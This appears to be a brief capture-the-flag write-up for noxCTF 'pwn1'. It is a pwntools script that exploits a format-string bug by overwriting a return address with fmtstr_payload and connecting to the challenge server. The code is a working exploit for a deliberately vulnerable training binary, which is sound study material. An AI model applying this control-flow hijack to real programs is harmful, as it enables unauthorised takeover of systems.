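noxCTF-pwn1 - Format String

Format string

Ugh, my blog blew up. Everything I wrote before is gone and I can't be bothered to write it all again, this blog platform is such a pain, so I'll just post the write-up. The process is to leak the ret address remotely, because ASLR is not enabled.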

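from pwn import *

context.log_level = 'debug'
elf = ELF('./believeMe.dms')
libc = elf.libc

# Remote challenge service; switch to the commented line to test locally
p = remote('18.223.228.52', 13337)
#p = process('./believeMe.dms')

# Format-string argument offset is 9. Overwrite the leaked return-address
# slot (0xffffdd2c) with 0x804867b, using two 2-byte (%hn) writes.
payload = fmtstr_payload(9, {0xffffdd2c: 0x804867b}, write_size='short')

p.sendline(payload)

p.interactive()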